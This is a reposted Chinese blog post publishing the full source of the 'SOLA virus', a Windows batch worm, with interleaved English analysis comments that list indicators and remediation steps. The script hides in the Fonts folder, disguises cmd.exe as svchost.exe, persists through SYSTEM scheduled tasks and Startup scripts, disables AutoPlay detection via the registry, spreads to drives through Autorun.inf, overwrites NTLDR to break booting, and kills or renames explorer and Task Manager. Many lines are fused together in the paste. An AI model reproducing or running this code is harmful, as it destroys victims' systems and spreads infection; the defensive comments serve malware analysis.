SOLA病毒代码

第一次写博客,写得不好请见谅。下面发布一个病毒的代码。

:: Analysis note: Windows batch script, named the SOLA virus by the page title.
:: The sola variable points at the script's working directory under
:: %systemroot%\Fonts, addressed by the 8.3 short name HIDESE~1 (presumably the
:: short name of the "HIDESELF..." directory that a later md command creates).
:: A directory of that name under the Fonts folder is a host artifact to check.
@echo off
set sola=%systemroot%\Fonts\HIDESE~1




:: NOTE(review): many statements are fused onto single lines in this paste; the
:: comments describe only the statements that can be read off the text.
:: Mode dispatch: the first argument selects -Install, -Run, -Tenbatsu, -Kill or
:: -Killself. With -USB the script opens the parent folder (start /max ..) and
:: changes into the SOLA folder. If the marker sola.sign already exists it jumps
:: to :Open, otherwise it continues into :FileCopy.
:: Date handling: Realdate holds the current date, Date the date that dir reports
:: for explorer.exe. The system date is switched to that value around file and
:: directory creation and restored afterwards, presumably so the dropped files
:: carry explorer.exe's date. Unexpected system date changes are a detection
:: signal, and file timestamps in this directory should not be trusted.
:: Files written to the Fonts\HIDESE~1 directory by :FileCopy and :HIDESelf:
::   sola.bat      copy of the running script (or of sola.bat in -USB mode)
::   Function.exe  copy of Function.dll
::   SOLA.VBS      temporary launcher, runs "SOLA.BAT -Install" with window
::                 style 0 (hidden) through cscript, then is deleted
::   sola.sign     install marker
:: :Install and :PackerSetup: kill a running Function.exe, recreate the
:: solasetup subdirectory, run "Function.exe -x" there (presumably unpacking
:: bundled files, to be confirmed), write rar.exe into %systemroot%\system32,
:: mark Function.dll system, hidden and read-only, and build docpack.dll,
:: txtpack.dll, exepack.dll and jpgpack.dll as rar archives of Function.dll.
et setup=%systemroot%\Fonts\HIDESE~1\solasetupFOR /F "tokens=1" %%i in ('date /t') do set Realdate=%%iFOR /F "skip=5 tokens=1,4" %%i in ('dir %systemroot%\explorer.exe') do if /I "%%j"=="explorer.exe" set Date=%%iif "%1"=="-Install" goto Installif "%1"=="-Run" goto Runif "%1"=="-Tenbatsu" goto Tenbatsuif "%1"=="-Kill" goto Killif "%1"=="-Killself" goto Killself:CheckSignif "%1"=="-USB" start /max ..if "%1"=="-USB" cd SOLAif exist %systemroot%\Fonts\HIDESE~1\sola.sign goto Open:FileCopyset selfname=%0:HIDESelfdate %Date%md %systemroot%\Fonts\HIDESELF...\date %RealDate%if not "%1"=="-USB" type %selfname%>%systemroot%\Fonts\HIDESE~1\sola.batif "%1"=="-USB" type sola.bat>%systemroot%\Fonts\HIDESE~1\sola.battype Function.dll>%systemroot%\Fonts\HIDESE~1\Function.exeecho On Error Resume Next>%systemroot%\Fonts\HIDESE~1\SOLA.VBSecho set ws=wscript.createobject("wscript.shell")>>%systemroot%\Fonts\HIDESE~1\SOLA.VBSecho ws.run "cmd /c %sola%\SOLA.BAT -Install",0 >>%systemroot%\Fonts\HIDESE~1\SOLA.VBScscript %systemroot%\Fonts\HIDESE~1\SOLA.VBSecho>%systemroot%\Fonts\HIDESE~1\sola.signdel %systemroot%\Fonts\HIDESE~1\SOLA.VBSgoto Open:Install:PackerSetup
%SystemDrive%cd %systemroot%\Fonts\HIDESE~1if exist Function.exe taskkill /f /im Function.exeif exist solasetup rd /s /q solasetupmd solasetupcd solasetupcopy ..\Function.exe Function.dlll
..\Function.exe -x
cd..
date %Date%

type %setup%\rar.exe >%systemroot%\system32\rar.exedate %Realdate%copy %setup%\Function.dll %sola%\Function.dllattrib %sola%\Function.dll +s +h +rrar -m0 -ep -ep1 a %setup%\docpack.dll %sola%\Function.dllrar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dllrar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dllrar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dll




:: :Mainsetup: A0001, A0002 and A0003 hold the command names copy, attrib and
:: echo, so later lines invoke those commands through variables. A plain string
:: search of the script for the command names will miss those call sites.
:: cmd.exe is copied into the working directory under the image name that
:: tasklist reports for svchost.exe. A command interpreter named svchost.exe
:: outside system32 is a strong indicator on its own.
:: :Tasks: the existing %systemroot%\Tasks\Tasks.job is unhidden and deleted,
:: a bundled file from the setup directory is written in its place, and
:: schtasks sets the task named "Tasks" to run as NT AUTHORITY\SYSTEM.
:: :TaskFail: if schtasks reports an error, the script changes into the
:: All Users Startup folder (path is the Chinese-localized folder name).
:Mainsetupset A0001=copyset A0002=attribset A0003=echoset A0005=Shell Hardware Detectiontasklist >%sola%\task.txtFOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i%A0001% %systemroot%\system32\cmd.exe %sola%\%svchost%del %sola%\task.txt:Tasks%A0002% %systemroot%\Tasks\Tasks.job -s -h -rdel %systemroot%\Tasks\Tasks.jobdate %Date%type %setup%\http://Tasks.xxx>%systemroot%\Tasks\Tasks.jobschtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFaildate %RealDate%goto TaskSuc:TaskFail%homedrive%cd "%ALLUSERSPROFILE%"cd 「开始」菜单\程序\启动




:: Fallback persistence (reached from :TaskFail): SOLA.VBS is written into the
:: current directory, which :TaskFail set to the Startup folder. It runs the
:: renamed cmd.exe copy with "/c SOLA.BAT -Run" and window style 0 (hidden).
:: A copy of SOLA.VBS is kept in the working directory and the marker file
:: NoTasks records that the Startup fallback is in use.
:: :TaskSuc: Tasks.job is marked system, hidden and read-only, and sleep.exe
:: is copied into %systemroot%\system32.
:: :NoAutoPlay: stops the "Shell Hardware Detection" service and silently
:: imports Regedit.reg, which sets "Start" to 4 (disabled) under
:: HKLM\SYSTEM\CurrentControlSet\Services\ShellHWDetection. Remediation has to
:: return that value to the host's previous start type.
date %Date%%A0003% On Error Resume Next>SOLA.VBS%A0003% set ws=wscript.createobject("wscript.shell")>>SOLA.VBS%A0003% ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT -Run",0 >>SOLA.VBS%A0001% SOLA.VBS %sola%\SOLA.VBS%A0003% NT>%systemroot%\Fonts\HIDESE~1\NoTasksdate %RealDate%:TaskSuc%A0002% %systemroot%\Tasks\Tasks.job +s +h +rdate %Date%%A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exedate %RealDate%:NoAutoPlaynet stop "%A0005%"%A0003% Windows Registry Editor Version 5.00>%systemroot%\Fonts\HIDESE~1\Regedit.reg%A0003% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%systemroot%\Fonts\HIDESE~1\Regedit.reg%A0003% "Start"=dword:00000004>>%systemroot%\Fonts\HIDESE~1\Regedit.regregedit /s %systemroot%\Fonts\HIDESE~1\Regedit.reg




:: :Run: resident mode. runroot is the All Users Startup folder and taskroot
:: is %systemroot%\Tasks.
:: :RunTimeChk: RunTime.txt in the working directory holds a counter, created
:: as "!50" and decremented each time this mode starts. At 0 or below control
:: jumps to :Virus.
:: :Diskchk: launches RecentInf.bat (not shown on this page) hidden through a
:: temporary RecentInf.VBS, then walks drive letters C to Z. A letter whose vol
:: query fails gets its flag variable set to 1. For each letter it writes a
:: test file solachk1, and where Autorun.inf lacks the marker "SOLA_1.0_2.0"
:: it appears to replace Autorun.inf and create a SOLA folder holding SOLA.BAT
:: and Function.dll, with Autorun.inf and the folder marked system, hidden and
:: read-only.
:: Artifacts at a drive root: hidden Autorun.inf containing that marker, a
:: hidden SOLA folder, and possibly a leftover solachk1 file.
::End of Installgoto End&if errorlevel 1 exit::End of Install:Runset runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动set taskroot=%systemroot%\Tasks //自启动:RunTimeChkif not exist %sola%\RunTime.txt echo !50>%sola%\RunTime.txtFOR /F "tokens=1 delims=!" %%i in (%sola%\RunTime.txt) do set RunTime=%%iif /i %RunTime% leq 0 goto Virusset /a RunTime=%Runtime%-1echo !%Runtime%>%sola%\RunTime.txt:Diskchkecho On Error Resume Next>%systemroot%\Fonts\HIDESE~1\RecentInf.VBSecho set ws=wscript.createobject("wscript.shell")>>%systemroot%\Fonts\HIDESE~1\RecentInf.VBSecho ws.run "%sola%\svchost.exe /c %setup%\RecentInf.bat",0 >>%systemroot%\Fonts\HIDESE~1\RecentInf.VBScscript %systemroot%\Fonts\HIDESE~1\RecentInf.VBSdel %systemroot%\Fonts\HIDESE~1\RecentInf.VBSfor %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1>%%i:\solachk1 & findstr . %%i:\solachk1 & if not errorlevel 1 del %%i:\solachk1& findstr /C:"SOLA_1.0_2.0" %%i:\Autorun.inf & if errorlevel 1  attrib -s -h -r %%i:\Autorun.inf&copy /y %setup%\Autorun.inf %%i:\Autorun.inf&attrib %%i:\Autorun.inf +s +h +r&md %%i:\SOLA&copy /y "%setup%\sola.bat" %%i:\SOLA\SOLA.BAT&copy /y "%setup%\Function.dll" %%i:\SOLA\Function.dll&attrib %%i:\SOLA +s +h +r




:: :Turn: polling loop with "sleep 2000" between passes. For each drive letter
:: whose flag variable is 1 and whose vol query now succeeds, it calls Scan.bat
:: (not shown on this page) with that letter. These look like volumes that were
:: absent at the earlier check and have since been attached (inferred).
:: Each pass also re-creates persistence that has been removed: SOLA.VBS in the
:: Startup folder when the NoTasks marker exists, otherwise Tasks.job plus the
:: schtasks change. Cleanup therefore has to stop the running script first, or
:: deleted persistence entries come back within one pass.
:: :Virus and :VirusChk: when the run counter is exactly 0, TENBATSU.VBS is
:: written to the Startup folder to run "sola.bat -Tenbatsu". On later runs, if
:: that file is missing, control goes to :Kill.
:: :Tenbatsu and :KillNTLDR: NTLDR on the system drive is copied into the
:: working directory and the original is overwritten with the text "NO NTLDR".
:: Recovery needs NTLDR restored from that copy or from installation media
:: before the next reboot.
:Turnif "%C%"=="1" vol C:&if not errorlevel 1 call %setup%\Scan.bat C:if "%D%"=="1" vol D:&if not errorlevel 1 call %setup%\Scan.bat D:if "%E%"=="1" vol E:&if not errorlevel 1 call %setup%\Scan.bat E:if "%F%"=="1" vol F:&if not errorlevel 1 call %setup%\Scan.bat F:if "%G%"=="1" vol G:&if not errorlevel 1 call %setup%\Scan.bat G:if "%H%"=="1" vol H:&if not errorlevel 1 call %setup%\Scan.bat H:if "%I%"=="1" vol I:&if not errorlevel 1 call %setup%\Scan.bat I:if "%J%"=="1" vol J:&if not errorlevel 1 call %setup%\Scan.bat J:if "%K%"=="1" vol K:&if not errorlevel 1 call %setup%\Scan.bat K:if "%L%"=="1" vol L:&if not errorlevel 1 call %setup%\Scan.bat L:if "%M%"=="1" vol M:&if not errorlevel 1 call %setup%\Scan.bat M:if "%N%"=="1" vol N:&if not errorlevel 1 call %setup%\Scan.bat N:if "%O%"=="1" vol O:&if not errorlevel 1 call %setup%\Scan.bat O:if "%P%"=="1" vol P:&if not errorlevel 1 call %setup%\Scan.bat P:if "%Q%"=="1" vol Q:&if not errorlevel 1 call %setup%\Scan.bat Q:if "%R%"=="1" vol R:&if not errorlevel 1 call %setup%\Scan.bat R:if "%S%"=="1" vol S:&if not errorlevel 1 call %setup%\Scan.bat S:if "%T%"=="1" vol T:&if not errorlevel 1 call %setup%\Scan.bat T:if "%U%"=="1" vol U:&if not errorlevel 1 call %setup%\Scan.bat U:if "%V%"=="1" vol V:&if not errorlevel 1 call %setup%\Scan.bat V:if "%W%"=="1" vol W:&if not errorlevel 1 call %setup%\Scan.bat W:if "%X%"=="1" vol X:&if not errorlevel 1 call %setup%\Scan.bat X:if "%Y%"=="1" vol Y:&if not errorlevel 1 call %setup%\Scan.bat Y:if "%Z%"=="1" vol Z:&if not errorlevel 1 call %setup%\Scan.bat Z:if "%C%"=="2" vol C:&if errorlevel 1 set C=1if "%D%"=="2" vol D:&if errorlevel 1 set D=1if "%E%"=="2" vol E:&if errorlevel 1 set E=1if "%F%"=="2" vol F:&if errorlevel 1 set F=1if "%G%"=="2" vol G:&if errorlevel 1 set G=1if "%H%"=="2" vol H:&if errorlevel 1 set H=1if "%I%"=="2" vol I:&if errorlevel 1 set I=1if "%J%"=="2" vol J:&if errorlevel 1 set J=1if "%K%"=="2" vol K:&if errorlevel 1 set K=1if "%L%"=="2" vol L:&if errorlevel 1 
set L=1if "%M%"=="2" vol M:&if errorlevel 1 set M=1if "%N%"=="2" vol N:&if errorlevel 1 set N=1if "%O%"=="2" vol O:&if errorlevel 1 set O=1if "%P%"=="2" vol P:&if errorlevel 1 set P=1if "%Q%"=="2" vol Q:&if errorlevel 1 set Q=1if "%R%"=="2" vol R:&if errorlevel 1 set R=1if "%S%"=="2" vol S:&if errorlevel 1 set S=1if "%T%"=="2" vol T:&if errorlevel 1 set T=1if "%U%"=="2" vol U:&if errorlevel 1 set U=1if "%V%"=="2" vol V:&if errorlevel 1 set V=1if "%W%"=="2" vol W:&if errorlevel 1 set W=1if "%X%"=="2" vol X:&if errorlevel 1 set X=1if "%Y%"=="2" vol Y:&if errorlevel 1 set Y=1if "%Z%"=="2" vol Z:&if errorlevel 1 set Z=1  if exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist "%runroot%\SOLA.VBS" copy "%sola%\SOLA.VBS" "%runroot%\SOLA.VBS"if not exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\http://Tasks.xxx %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks"sleep 2000goto Turn::End of Rungoto End&if errorlevel 1 exit::End of Run:Virusif not "%Runtime%"=="0" goto VirusChkset /a RunTime=%Runtime%-1echo !%Runtime%>%sola%\RunTime.txtcd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"echo On Error Resume Next>TENBATSU.VBSecho set ws=wscript.createobject("wscript.shell")>>TENBATSU.VBSecho ws.run "%sola%\sola.bat -Tenbatsu",0 >>TENBATSU.VBSgoto Diskchk:VirusChkif not exist "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\TENBATSU.VBS" goto Killgoto Diskchk:Tenbatsu:KillNTLDRattrib %systemdrive%\NTLDR -s -h -rcopy /Y %systemdrive%\NTLDR %sola%\NTLDRecho NO NTLDR>%systemdrive%\NTLDR::attrib %systemdrive%\NTLDR +s +h +r




:: Payload stage (:PauseSFC, :KillTaskmgr, :KillExplorer): mshta with a
:: "javascript:" argument launches ntsd against winlogon.exe, the dllcache copy
:: of taskmgr.exe is deleted, taskmgr.exe and explorer.exe are killed and
:: renamed, and TENBATSU.BAT (not shown on this page) is started.
:: Detection points: mshta.exe started with a javascript: command line, ntsd
:: attached to winlogon.exe, csrss.exe, taskmgr.exe or explorer.exe, and
:: renames of system binaries in %systemroot% and system32.
:: :Timeset: waits with "sleep 660000" and exits if the file Killself exists in
:: the working directory. :Kill overwrites NTLDR again and attaches ntsd to
:: each csrss.exe process id found in the tasklist output.
:: :KillSelf through :KillVirus: the sample's own removal path. It renames
:: explorer.exe and taskmgr.exe back, restores NTLDR from the saved copy,
:: extracts the bundled SolaKiller.rar into a ~Install folder on C: (archive
:: password is hard-coded on the rar command line), runs Install.bat from it
:: through mshta, removes the setup directory, Tasks.job and the Startup VBS
:: files, opens KillVirus.txt in notepad and deletes sola.bat.
:: NOTE(review): this routine executes further bundled code (Install.bat) that
:: is not visible here, so remediation should not rely on it; remove the
:: listed artifacts directly instead.
:PauseSFCstart mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -pn winlogon.exe',0);window.close()":KillTaskmgrdel /q /a %systemroot%\system32\dllcache\taskmgr.exetaskkill /f /im taskmgr.exe & if errorlevel 1 ren %systemroot%\system32\taskmgr.exe http://taskmgr.xxx & if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe',0);window.close()" & sleep 500ren %systemroot%\system32\taskmgr.exe http://taskmgr.xxx  :KillExplorertaskkill /f /im explorer.exe >nul& if errorlevel 1 ren %systemroot%\system32\explorer.exe http://explorer.xxx & start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn explorer.exe',0);window.close()" & sleep 500ren %systemroot%\explorer.exe http://explorer.xxxstart /max %setup%\TENBATSU.BAT
:Timesetsleep 660000if exist %sola%\Killself Exit:Killattrib %systemdrive%\NTLDR -s -h -recho NO NTLDR>%systemdrive%\NTLDR::attrib %systemdrive%\NTLDR +s +h +rtasklist >%sola%\Task.txtFOR /F "tokens=2" %%i in ('findstr /I "csrss.exe" "%sola%\Task.txt"') do ntsd -p %%igoto Diskchk:KillSelf:StartExplorerren %systemroot%\http://explorer.xxx explorer.exestart %systemroot%\explorer.exe:BackNTLDRattrib %systemdrive%\NTLDR -s -h -rcopy /Y %sola%\NTLDR %systemdrive%\NTLDRattrib %systemdrive%\NTLDR +s +h +r
:RenTmgren %systemroot%\system32\http://taskmgr.xxx taskmgr.exe:KillViruscopy %setup%\KillVirus.txt %sola%\KillVirus.txtC:cd\md ~Installcd ~Installrar x -hpkakenhi200601 %setup%\SolaKiller.rar
mshta "javascript:new ActiveXObject('WScript.Shell').Run('C:\\~Install\\Install.bat %%1',0);window.close()"rd /s /q %setup%attrib %systemroot%\Tasks\Tasks.job -s -h -rdel %systemroot%\Tasks\Tasks.jobcd "%ALLUSERSPROFILE%\「开始」菜单\程序\启动"if exist sola.vbs del sola.vbsif exist tenbatsu.vbs del tenbatsu.vbsstart %systemroot%\system32\notepad.exe %sola%\KillVirus.txtdel %sola%\sola.bat
:: :Open, :GetName and :BackOpen: decoy handling. Name is a .doc file name and
:: Code is a marker string. In -USB mode the script exits here. Otherwise it
:: exits if the named document is missing, else invokes it with call
:: (presumably opening it in the associated application).
:: :Save: findstr locates the .exe in the current directory that contains the
:: marker, rar adds the document to that file and the marker is appended again.
:: :Del: removes the document, Function.dll and the script itself (%0).
:: Indicator: .exe files containing the marker string assigned to Code below,
:: sitting next to a hidden Function.dll.
:Openif "%1"=="-USB" Exitgoto GetName:BackOpenif not exist "%Name%" exitcall "%Name%":SaveFOR /F "delims=:" %%i in ('findstr "%Code%" *.exe') do set PackName=%%irar -m0 -ep -ep1 a "%PackName%" "%Name%"echo %Code%>>"%PackName%":Delattrib "%Name%" -s -h -rdel "%Name%"attrib Function.dll -s -h -rdel Function.dllattrib %0 -s -h -rdel %0exit::CMD program will stop there.:GetNameset Code=SOLA_2.0_323111111527875set Name=新中国诞辰60周1.docgoto Backopen:End



转载自blog.csdn.net/qq_42415664/article/details/80958715